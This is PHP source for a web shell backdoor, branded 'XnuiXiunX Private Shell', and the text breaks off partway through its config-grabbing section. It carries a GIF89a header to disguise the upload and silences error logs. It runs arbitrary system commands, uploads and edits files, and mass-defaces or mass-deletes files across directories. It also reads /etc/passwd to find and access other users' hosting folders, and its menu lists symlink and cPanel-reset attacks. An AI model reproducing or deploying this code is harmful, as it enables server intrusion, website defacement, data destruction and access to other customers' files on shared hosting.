XnuiXiunX Private Shell

1. <!DOCTYPE html>
2. GIF89a;
3. <?php
4. /*
5. [ Tak semua kami ngotak sendiri ]
6. Special thanks for Holiq@Indosec
7. Collabs team 22XploiterCrew ft Indosec Coder Team
8. */
9.  
10. error_reporting(0);
11. set_time_limit(0);
12. @clearstatcache();
13. @ini_set('error_log',NULL);
14. @ini_set('log_errors',0);
15. @ini_set('max_execution_time',0);
16. @ini_set('output_buffering',0);
17. @ini_set('display_errors', 0);
18.  
19. function w($dir,$perm) {
20. if(!is_writable($dir)) {
21. return "<font color=red>".$perm."</font>";
22. } else {
23. return "<font color=lime>".$perm."</font>";
24. }
25. }
26. function r($dir,$perm) {
27. if(!is_readable($dir)) {
28. return "<font color=red>".$perm."</font>";
29. } else {
30. return "<font color=lime>".$perm."</font>";
31. }
32. }
33.  
34. function exe($cmd) {
35. if(function_exists('system')) {
36. @ob_start();
37. @system($cmd);
38. $buff = @ob_get_contents();
39. @ob_end_clean();
40. return $buff;
41. } elseif(function_exists('exec')) {
42. @exec($cmd,$results);
43. $buff = "";
44. foreach($results as $result) {
45. $buff .= $result;
46. } return $buff;
47. } elseif(function_exists('passthru')) {
48. @ob_start();
49. @passthru($cmd);
50. $buff = @ob_get_contents();
51. @ob_end_clean();
52. return $buff;
53. } elseif(function_exists('shell_exec')) {
54. $buff = @shell_exec($cmd);
55. return $buff;
56. }
57. }
58.  
59. function perms($file){
60. $perms = fileperms($file);
61.  
62. if (($perms & 0xC000) == 0xC000) {
63. // Socket
64. $info = 's';
65. } elseif (($perms & 0xA000) == 0xA000) {
66. // Symbolic Link
67. $info = 'l';
68. } elseif (($perms & 0x8000) == 0x8000) {
69. // Regular
70. $info = '-';
71. } elseif (($perms & 0x6000) == 0x6000) {
72. // Block special
73. $info = 'b';
74. } elseif (($perms & 0x4000) == 0x4000) {
75. // Directory
76. $info = 'd';
77. } elseif (($perms & 0x2000) == 0x2000) {
78. // Character special
79. $info = 'c';
80. } elseif (($perms & 0x1000) == 0x1000) {
81. // FIFO pipe
82. $info = 'p';
83. } else {
84. // Unknown
85. $info = 'u';
86. }
87.  
88. // Owner
89. $info .= (($perms & 0x0100) ? 'r' : '-');
90. $info .= (($perms & 0x0080) ? 'w' : '-');
91. $info .= (($perms & 0x0040) ?
92. (($perms & 0x0800) ? 's' : 'x' ) :
93. (($perms & 0x0800) ? 'S' : '-'));
94. // Group
95. $info .= (($perms & 0x0020) ? 'r' : '-');
96. $info .= (($perms & 0x0010) ? 'w' : '-');
97. $info .= (($perms & 0x0008) ?
98. (($perms & 0x0400) ? 's' : 'x' ) :
99. (($perms & 0x0400) ? 'S' : '-'));
100.  
101. // World
102. $info .= (($perms & 0x0004) ? 'r' : '-');
103. $info .= (($perms & 0x0002) ? 'w' : '-');
104. $info .= (($perms & 0x0001) ?
105. (($perms & 0x0200) ? 't' : 'x' ) :
106. (($perms & 0x0200) ? 'T' : '-'));
107.  
108. return $info;
109. }
110.  
111.  
112. if(isset($_GET['path'])){
113. $path = $_GET['path'];
114. chdir($path);
115. }else{
116. $path = getcwd();
117. }
118. $path = str_replace('\\','/',$path);
119. $paths = explode('/',$path);
120. if(isset($_GET['dir'])) {
121. $dir = $_GET['dir'];
122. chdir($dir);
123. } else {
124. $dir = getcwd();
125. }
126. $kernel = php_uname();
127. $ip = getHostByName(getHostName());
128. $ver = phpversion();
129. $dom = $_SERVER['HTTP_HOST'];
130. $dir = str_replace("\\","/",$dir);
131. $scdir = explode("/", $dir);
132. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "On" : "Off";
133. $ds = @ini_get("disable_functions");
134. $mysql = (function_exists('mysql_connect')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
135. $curl = (function_exists('curl_version')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
136. $wget = (exe('wget --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
137. $perl = (exe('perl --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
138. $python = (exe('python --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
139. $show_ds = (!empty($ds)) ? "$ds" : "NONE";
140. $total = formatSize(disk_total_space($path));
141. $free = formatSize(disk_free_space($path));
142. $total1 = disk_total_space($path);
143. $free1 = disk_free_space($path);
144. $used = formatSize($total1 - $free1);
145. function formatSize( $bytes ) {
146. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
147. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
148. return( round( $bytes, 2 ) . " " . $types[$i] );
149. }
150.  
151. function ambilKata($param, $kata1, $kata2){
152. if(strpos($param, $kata1) === FALSE) return FALSE;
153. if(strpos($param, $kata2) === FALSE) return FALSE;
154. $start = strpos($param, $kata1) + strlen($kata1);
155. $end = strpos($param, $kata2, $start);
156. $return = substr($param, $start, $end - $start);
157. return $return;
158. }
159.  
160. echo "
161. <html>
162. <title>XnuiXiunX Private Shell</title>
163. <head>
164. <meta name='viewport' content='widht=device-widht, initial-scale=0.75'>
165. <link rel='icon' type='image/png' href='https://avatars3.githubusercontent.com/u/53482167?s=460&v=4'/>
166. <meta name='author' content='XnuiXiunX'/>
167. <meta name='copyright' content='Indonesian Error System'/>
168. <meta name='description' content='Imutz Shell Backdoor'>
169. <meta name='theme-color' content='#000'>
170. <link rel='stylesheet' href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css'>
171. <link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.7.2/css/all.css' >
172. <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'>
173. <script src='https://code.jquery.com/jquery-3.3.1.js'></script>
174. <script src='https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js'></script>
175. <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
176. </head>
177. <body class='text-light'>
178. <script>
179. $(document).ready(function(){
180. $(window).scroll(function(){
181. if ($(this).scrollTop() > 700) {
182. $('.scrollToTop').fadeIn();
183. }else{
184. $('.scrollToTop').fadeOut();
185. }
186. });
187. $('.scrollToTop').click(function(){
188. $('html, body').animate({scrollTop : 0},1000);
189. return false;
190. });
191. });
192. </script>
193. <style>
194. body{background-color:black;}
195. @import url(https://fonts.googleapis.com/css?family=Lato);
196. body{margin:0;padding:0;font-family:'Lato';}
197. #tab table thead th{padding:5px;font-size:16px;}
198. #tab tr {border-bottom:1px solid #fff;}
199. #tab tr:hover{background:#5B6F7D; color:#fff;}
200. #tab tr td{padding:5px;}
201. #tab tr td .badge{font-size:13px;}
202. a {font-family:'Quicksand';color:white;}
203. a:hover{color:dodgerBlue;}
204. .ico {width:20px;}
205. .ico2{width:20px;}
206. .scrollToTop{
207. position:fixed;
208. bottom:30px;
209. right:30px;
210. width:35px;
211. height:35px;
212. background:#262626;
213. color:#fff;
214. border-radius:15%;
215. text-align:center;
216. opacity:.5;
217. }
218. .scrollToTop:hover{color:#fff;}
219. .up{font-size:20px;line-height:35px;}
220. .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
221. .lain:hover{color:#fff;}
222. .tambah{
223. width:35px;
224. height:35px;
225. line-height:35px;
226. border:1px solid;
227. border-radius:50%;
228. text-align:center;
229. }
230. .fiture{margin:2px;}
231. .tmp{background:#F4F4F4;color:rgb(153,153,153);}
232. .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;}
233. .about{color:#000;}
234. .about .card-body .img{
235. position: relative;
236. background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
237. background-size: cover;
238. width: 150px;
239. height: 150px;
240. }
241. .butn {
242. position: relative;
243. text-align: center;
244. padding: 3px;
245. background:rgba(225,225,225,.3);
246. -webkit-transition: background 300ms ease, color 300ms ease;
247. transition: background 300ms ease, color 300ms ease;
248. }
249. input[type='radio'].toggle {
250. display: none;
251. }
252. input[type='radio'].toggle + label {
253. cursor: pointer;
254. margin: 0 2px;
255. width: 60px;
256. }
257. input[type='radio'].toggle + label:after {
258. position: absolute;
259. content: '';
260. top: 0;
261. background: #fff;
262. height: 100%;
263. width: 100%;
264. z-index: -1;
265. -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
266. transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
267. }
268. input[type='radio'].toggle.toggle-left + label:after {
269. left: 100%;
270. }
271. input[type='radio'].toggle.toggle-right + label {
272. margin-left: -5px;
273. }
274. input[type='radio'].toggle.toggle-right + label:after {
275. left: -100%;
276. }
277. input[type='radio'].toggle:checked + label {
278. cursor: default;
279. color: #000;
280. -webkit-transition: color 400ms;
281. transition: color 400ms;
282. }
283. input[type='radio'].toggle:checked + label:after {
284. left: 0;
285. }
286. </style>
287. <nav class='navbar static-top navbar-dark'>
288. <button class='navbar-toggler'type='button' data-toggle='collapse' data-target='#info'>
289. <i style='color:#fff;' class='fa fa-user'></i>
290. </button>
291. <div class='collapse navbar-collapse' id='info'>
292. <div class='table-responsive-lg'>
293. <ul>
294. <a href='?' class='fiture btn btn-primary btn-sm btn-block mb-2'><i class='fa fa-home'></i> Home</a>
295. <div class='row'>
296. <div class='col'>
297. <a href='?dir=$dir&aksi=upload' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-upload'></i> Upload</a>
298. </div>
299. <div class='col'>
300. <a href='?dir=$dir&aksi=buat_file' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus-circle'></i> Buat File</a>
301. </div>
302. <div class='col'>
303. <a href='?dir=$dir&aksi=buat_folder' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus'></i> Buat Folder</a>
304. </div>
305. </div>
306. <div class='row'>
307. <div class='col'>
308. <a href='?dir=$dir&aksi=MassDeface' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Mass Deface</a>
309. </div>
310. <div class='col'>
311. <a href='?dir=$dir&aksi=MassDellete' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-trash'></i> Mass Delete</a>
312. </div>
313. <div class='col'>
314. <a href='?dir=$dir&aksi=jumping' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Jumping</a>
315. </div>
316. </div>
317. <div class='row'>
318. <div class='col'>
319. <a href='?dir=$dir&aksi=config' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-cogs'></i> Config</a>
320. </div>
321. <div class='col'>
322. <a href='?dir=$dir&aksi=adminer' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-user'></i> Adminer</a>
323. </div>
324. <div class='col'>
325. <a href='?dir=$dir&aksi=symlink' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-circle'></i> Symlink</a>
326. </div>
327. </div>
328. <div class='row'>
329. <div class='col'>
330. <a href='?dir=$dir&aksi=CpanelReset' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-key'></i> Auto Reset Cpanel</a>
331. </div>
332. <div class='col'>
333. <a href='?keluar' class='fiture btn btn-warning btn-sm btn-block'><i class='fa fa-sign-out'></i> keluar</a>
334. </div>
335. </div>
336. <a href='?dir=$dir&aksi=InfoServer' class='fiture btn btn-info btn-sm btn-block mt-2'>Info Server</a>
337. </ul>
338. </div>
339. </div>
340. </nav>
341. <div class=''>
342. <h1 class='text-center'><a href='http://racetomars.net/'>[ > ] XnuiXiunX Private Shell [ < ]</h1>
343. <center><p>Silent But Deadly and This Exploit will Shut You Down!!</a></p></center>
344. <hr/>";
345. //keluar
346. if (isset($_GET['keluar'])) {
347. session_start();
348. session_destroy();
349. echo '<script>window.location="?";</script>';
350. }
351.  
352. // Info Server
353. if($_GET['aksi'] == 'InfoServer'){
354. echo '
355. <div class="alert alert-info mt-3">
356. <h3 class="text-center">Informasi Server</h3><hr>
357. <li>Nama Server : '.$_SERVER["SERVER_NAME"].'</li>
358. <li>Ip Address : '.$_SERVER["SERVER_ADDR"].'</li>
359. <li>Port : '.$_SERVER["SERVER_PORT"].'</li>
360. <li>HDD : '.$used.' / '.$total.'</font> ( Free: '.$free.' )</li>
361. <li>Protokol : '.$_SERVER["SERVER_PROTOCOL"].'</li>
362. <li>Save Data : '.$_SERVER["HTTP_SAVE_DATA"].'</li>
363. <li>Save Mode : '.$sm.'</li>
364. <li>Fungsi Nonaktif : '.$show_ds.'</li>
365. <li>Koneksi : '.$_SERVER["HTTP_CONNECTION"].'</li>
366. <li>Software : '.$_SERVER["SERVER_SOFTWARE"].'</li>
367. <li>Dokumen Root : '.$_SERVER["DOCUMENT_ROOT"].'</li>
368. <li>G-Interface : '.$_SERVER["GATEWAY_INTERFACE"].'</li>
369. <li>R-Method : '.$_SERVER["REQUEST_METHOD"].'</li>
370. <li>Mysql : '.$mysql.'</li>
371. <li>Perl : '.$perl.'</li>
372. <li>Wget : '.$wget.'</li>
373. <li>Curl : '.$curl.'</li>
374. <li>Sistem Server : '.$kernel.'</li>
375. <hr>
376. <li>Your IP: '.$_SERVER["REMOTE_ADDR"].'</li>
377. <li>Your Browser : '.$_SERVER["HTTP_USER_AGENT"].'</li>
378. </div>';
379. }
380.  
381. //upload
382. if ($_GET['aksi'] == 'upload') {
383. echo
384. "<form method='post' enctype='multipart/form-data' name='uploader' id='uploader'>
385. <div class='form-group'>
386. <label>Upload File: </label><br>
387. <input class='' type='file' name='file'>
388. </div>
389. <div class='form-group'>
390. <input class='btn btn-primary btn-sm' type='submit' value='Upload'>
391. </div>
392. </form>";
393.  
394. if(isset($_FILES['file'])){
395. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$_FILES['file']['name'])){
396. echo '<script>window.location="?dir='.$dir.'"; alert("Upload Berhasil");</script>';
397. }else{
398. echo '<script>alert("Gagal Upload!!!");</script>';
399. }
400. }
401. }
402.  
403. //openfile
404. if (isset($_GET['dirf'])) {
405. $file = $_GET['dirf'];
406. }
407.  
408. //buat_file
409. if ($_GET['aksi'] == 'buat_file') {
410.  
411. $output = "
412. <form method='post'>
413. <input type='text' class='form-control mb-3' name='nama_file' placeholder='Nama File'>
414. <textarea name='isi_file' class='form-control mb-3' rows='8' placeholder='Isi File'></textarea>
415. <button type='sumbit' class='btn btn-outline-primary btn-block' name='bikin'>Buat</button><br/>
416. </form>";
417. echo $output;
418.  
419. if (isset($_POST['bikin'])) {
420. $nama_file = $_POST['nama_file'];
421. $isi_file = $_POST['isi_file'];
422. $handle = fopen("$nama_file", "w");
423.  
424. if (fwrite($handle, $isi_file)) {
425. echo '<script>window.location="?dir='.$dir.'"; alert("Buat File Berhasil");</script>';
426. }else{
427. echo '<script>("File Gagal Dibuat");</script>';
428. }
429. }
430. }
431.  
432. /*
433. View
434. */
435. if($_GET['aksi'] == 'view') {
436. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
437. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
438. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center>';
439. echo "
440. <textarea rows='16' class='form-control mt-3' disabled=''>".htmlspecialchars(file_get_contents($file))."</textarea>
441. <br/><br/>";
442. }
443.  
444. /*
445. Edit
446. */
447. if($_GET['aksi'] == 'edit') {
448. $nama = basename($file);
449. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]
450. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center><hr>';
451. echo "<form method='post' class='mt-3'>
452. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
453. <textarea rows='16' class='form-control mb-3' name='isi'>".htmlspecialchars(file_get_contents($file))."</textarea>
454. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Ubah</button>
455. </form><br/>";
456.  
457. if(isset($_POST['edit_file'])) {
458. $updt = fopen("$file", "w");
459. $hasil = fwrite($updt, $_POST['isi']);
460.  
461. if ($hasil) {
462. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Mengubah Isi File");</script>';
463. }else{
464. echo '<script>alert("Gagal Mengubah Isi File");</script>';
465. }
466. }
467. }
468.  
469. /*
470. Ubah Nama
471. */
472. if($_GET['aksi'] == 'rename') {
473. $nama = basename($file);
474. echo '<center>[ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Kembali</a> ]</center>';
475. echo "<form method='post' class='mt-3'>
476. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
477. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
478. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Update</button><br/>
479. </form><br/>";
480.  
481. if(isset($_POST['rename_file'])) {
482. $lama = $file;
483. $baru = $_POST['namanew'];
484. rename( $baru, $lama);
485. if(file_exists($baru)) {
486. echo '<script>alert("Nama '.$baru.' Telah Digunakan");</script>';
487. }else{
488. if(rename( $lama, $baru)) {
489. echo '<script>window.location="?dir='.$dir.'"; alert("Sukses Mengganti Nama Menjadi '.$baru.'");</script>';
490. }else{
491. echo '<script>alert("Gagal Mengganti Nama");</script>';
492. }
493. }
494. }
495. }
496.  
497. /*
498. Delete File
499. */
500. if ($_GET['aksi'] == 'hapusf') {
501. $nama = basename($file);
502. echo '<center>
503. [ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
504. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
505. [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]</center>';
506. $output ="
507. <div class=''>
508. <center><br/>
509. <font color='white'>Yakin Ingin Menghapus File : $nama
510. </center><br/><br/>
511. <form method='post'>
512. <div class='row'>
513. <div class='col'>
514. <input type='submit' name='ya' class='float-right btn btn-success btn-success btn-block' value='Ya'>
515. </div>
516. <div class='col'>
517. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
518. </div>
519. </div>
520. </form>
521. </div><br/>";
522. echo $output;
523.  
524. if ($_POST['ya']) {
525. $hapus = unlink($file);
526. if ($hapus) {
527. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Menghapus File");</script>';
528. }else{
529. echo '<script>alert("Gagal Menghapus File!");</script>';
530. }
531. }
532. }
533.  
534. /*
535. Add Folder
536. */
537. if ($_GET['aksi'] == 'buat_folder' ) {
538. $output = "
539. <form method='post'>
540. <input type='text' class='form-control mb-4' name='nama_folder' placeholder='Nama Folder'>
541. <button type='sumbit' class='btn btn-outline-primary btn-block' name='buat'>Buat</button><br/>
542. </form>";
543. echo $output;
544.  
545. if (isset($_POST['buat'])) {
546. $nama_folder = $_POST['nama_folder'];
547. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]);
548. $fd = mkdir ($folder);
549. if ($fd) {
550. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Membuat Folder");</script>';
551. }else{
552. echo "echo '<script> alert('Folder ".$folder." Gagal Dibuat');</script>";
553. }
554. }
555. }
556.  
557. /*
558. Delete Folder
559. */
560. if ($_GET['aksi'] == 'hapus_folder' ) {
561. $nama = basename(getcwd());
562. $output ="
563. <center>[ <a href='?dir=".$dir."&aksi=rename_folder'>Ubah Nama</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]</center>
564. <div class='container'>
565. <center><br/>
566. <font color='white'>Yakin Ingin Menghapus Folder : $nama ?
567. </center><br/><br/>
568. <form method='post'>
569. <div class='row'>
570. <div class='col'>
571. <input type='submit' name='ya' class='float-right btn btn-success btn-block' value='Iya'>
572. </div>
573. <div class='col'>
574. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
575. </div>
576. </div>
577. </form>
578. </div><br/>";
579. echo $output;
580.  
581. if ($_POST['ya']) {
582. if(is_dir($dir)) {
583. if(is_writable($dir)) {
584. @rmdir($dir);
585. @exe("rm -rf $dir");
586. @exe("rmdir /s /q $dir");
587. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Menghapus Folder');</script>";
588. } else {
589. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Tidak Dapat Menghapus Folder');</script>";
590. }
591. }
592. }
593. exit;
594. }
595.  
596. /*
597. Ubah Nama Folder
598. */
599. if ($_GET['aksi'] == 'rename_folder' ) {
600. $nama = basename(getcwd());
601. $output="
602. <center>
603. [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]<hr></center><p class='ml-2'>Nama Folder => $nama</p>
604. <form method='post'>
605. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
606. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
607. </form>";
608. echo $output;
609.  
610. if (isset($_POST['ganti'])) {
611. $lama = $dir;
612. $baru = $_POST['namanew'];
613. $ubah = rename($lama, $baru);
614. if($ubah) {
615. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Mengganti Nama');</script>";
616. }else{
617. echo "<script>alert('Gagal Mengganti Nama');</script>" ;
618. }
619. }
620. exit;
621. }
622.  
623. /*
624. mass delete
625. */
626. if($_GET['aksi'] == 'MassDellete') {
627.  
628. function hapus_massal($dir,$namafile) {
629. if(is_writable($dir)) {
630. $dira = scandir($dir);
631. foreach($dira as $dirb) {
632. $dirc = "$dir/$dirb";
633. $lokasi = $dirc.'/'.$namafile;
634. if($dirb === '.') {
635. if(file_exists("$dir/$namafile")) {
636. unlink("$dir/$namafile");
637. }
638. } elseif($dirb === '..') {
639. if(file_exists("".dirname($dir)."/$namafile")) {
640. unlink("".dirname($dir)."/$namafile");
641. }
642. } else {
643. if(is_dir($dirc)) {
644. if(is_writable($dirc)) {
645. if($lokasi) {
646. echo "$lokasi > Terhapus\n";
647. unlink($lokasi);
648. $massdel = hapus_massal($dirc,$namafile);
649. }
650. }
651. }
652. }
653. }
654. }
655. }
656.  
657. if($_POST['start']) {
658. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
659. hapus_massal($_POST['d_dir'], $_POST['d_file']);
660. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
661. } else {
662. echo "<form method='post'>
663. <p><i class='fa fa-folder'></i> Lokasi</p>
664. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
665. <p><i class ='fa fa-file'></i> Nama File</p>
666. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br>
667. <input type='submit' name='start' value='Hapus' class='btn btn-danger form-control'>
668. </form>";
669. }
670. exit;
671. }
672.  
673.  
674.  
675. /*
676. Mass Deface
677. */
678. if($_GET['aksi'] == 'MassDeface') {
679.  
680. function tipe_massal($dir,$namafile,$isi_script) {
681. if(is_writable($dir)) {
682. $dira = scandir($dir);
683. foreach($dira as $dirb) {
684. $dirc = "$dir/$dirb";
685. $lokasi = $dirc.'/'.$namafile;
686. if($dirb === '.') {
687. file_put_contents($lokasi, $isi_script);
688. } elseif($dirb === '..') {
689. file_put_contents($lokasi, $isi_script);
690. } else {
691. if(is_dir($dirc)) {
692. if(is_writable($dirc)) {
693. echo "Berhasil => $lokasi\n";
694. file_put_contents($lokasi, $isi_script);
695. $MassDeface = tipe_massal($dirc,$namafile,$isi_script);
696. }
697. }
698. }
699. }
700. }
701. }
702.  
703. function tipe_biasa($dir,$namafile,$isi_script) {
704. if(is_writable($dir)) {
705. $dira = scandir($dir);
706. foreach($dira as $dirb) {
707. $dirc = "$dir/$dirb";
708. $lokasi = $dirc.'/'.$namafile;
709. if($dirb === '.') {
710. file_put_contents($lokasi, $isi_script);
711. } elseif($dirb === '..') {
712. file_put_contents($lokasi, $isi_script);
713. } else {
714. if(is_dir($dirc)) {
715. if(is_writable($dirc)) {
716. echo "Berhasil => $dirb/$namafile\n";
717. file_put_contents($lokasi, $isi_script);
718. }
719. }
720. }
721. }
722. }
723. }
724.  
725. if($_POST['start']) {
726.  
727. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
728. if($_POST['tipe'] == 'mahal') {
729. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
730. } elseif($_POST['tipe'] == 'murah') {
731. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
732. }
733. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
734. } else {
735. echo "<form method='post'>
736. <center>
737. <p>{ Type Mass Deface }</p>
738. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
739. <label for='toggle-on' class='butn'>Biasa</label>
740. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
741. <label for='toggle-off' class='butn'>Masal</label>
742. </center><hr>
743. <p><i class='fa fa-folder'></i> Lokasi</p>
744. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
745. <p><i class ='fa fa-file'></i> Nama File</p>
746. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br/>
747. <p><i class ='fa fa-file'></i> Isi File</p>
748. <textarea name='script' class='form-control' rows='5' placeholder='Hacked By 22XploiterCrew'></textarea><br/>
749. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
750. </form>";
751. }
752. exit;
753. }
754.  
755.  
756.  
757. /*
758. Jumping
759. */
760. if($_GET['aksi'] == 'jumping') {
761. $i = 0;
762. echo "<div class='card container'>";
763. if(preg_match("/hsphere/", $dir)) {
764. $urls = explode("\r\n", $_POST['url']);
765. if(isset($_POST['jump'])) {
766. echo "<pre>";
767. foreach($urls as $url) {
768. $url = str_replace(array("http://","www."), "", strtolower($url));
769. $etc = "/etc/passwd";
770. $f = fopen($etc,"r");
771. while($gets = fgets($f)) {
772. $pecah = explode(":", $gets);
773. $user = $pecah[0];
774. $dir_user = "/hsphere/local/home/$user";
775. if(is_dir($dir_user) === true) {
776. $url_user = $dir_user."/".$url;
777. if(is_readable($url_user)) {
778. $i++;
779. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
780. if(is_writable($url_user)) {
781. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
782. }
783. echo $jrw."<br>";
784. }
785. }
786. }
787. }
788. if($i == 0) {
789. } else {
790. echo "<br>Total ada ".$i." di ".$ip;
791. }
792. echo "</pre>";
793. } else {
794. echo '<center>
795. <form method="post">
796. List Domains: <br>
797. <textarea name="url" class="form-control">';
798. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
799. while($getss = fgets($fp)) {
800. echo $getss;
801. }
802. echo '</textarea><br>
803. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
804. </form></center>';
805. }
806. } elseif(preg_match("/vhosts/", $dir)) {
807. $urls = explode("\r\n", $_POST['url']);
808. if(isset($_POST['jump'])) {
809. echo "<pre>";
810. foreach($urls as $url) {
811. $web_vh = "/var/www/vhosts/$url/httpdocs";
812. if(is_dir($web_vh) === true) {
813. if(is_readable($web_vh)) {
814. $i++;
815. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
816. if(is_writable($web_vh)) {
817. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
818. }
819. echo $jrw."<br>";
820. }
821. }
822. }
823. if($i == 0) {
824. } else {
825. echo "<br>Total ada ".$i." Kamar di ".$ip;
826. }
827. echo "</pre>";
828. } else {
829. echo '<center>
830. <form method="post">
831. List Domains: <br>
832. <textarea name="url" class="form-control">';
833. bing("ip:$ip");
834. echo '</textarea><br>
835. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
836.  
837. </form></center>';
838. }
839. } else {
840. echo "<pre>";
841. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
842. while($passwd = fgets($etc)) {
843. if($passwd == '' || !$etc) {
844. echo "<font color=red>Can't read /etc/passwd</font><br/>";
845. } else {
846. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
847. foreach($user_jumping[1] as $user_pro_jump) {
848. $user_jumping_dir = "/home/$user_pro_jump/public_html";
849. if(is_readable($user_jumping_dir)) {
850. $i++;
851. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
852. if(is_writable($user_jumping_dir)) {
853. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
854. }
855. echo $jrw;
856. if(function_exists('posix_getpwuid')) {
857. $domain_jump = file_get_contents("/etc/named.conf");
858. if($domain_jump == '') {
859. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
860. } else {
861. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
862. foreach($domains_jump[1] as $dj) {
863. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
864. $user_jumping_url = $user_jumping_url['name'];
865. if($user_jumping_url == $user_pro_jump) {
866. echo " => ( <u>$dj</u> )<br>";
867. break;
868. }
869. }
870. }
871. } else {
872. echo "<br>";
873. }
874. }
875. }
876. }
877. }
878. if($i == 0) {
879. } else {
880. echo "<br>Total ada ".$i." Kamar di ".$ip;
881. }
882. echo "</pre>";
883. }
884. echo "</div>";
885. }
886.  
887. /*
888. Config
889. */
890. if($_GET['aksi'] == 'config') {
891. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
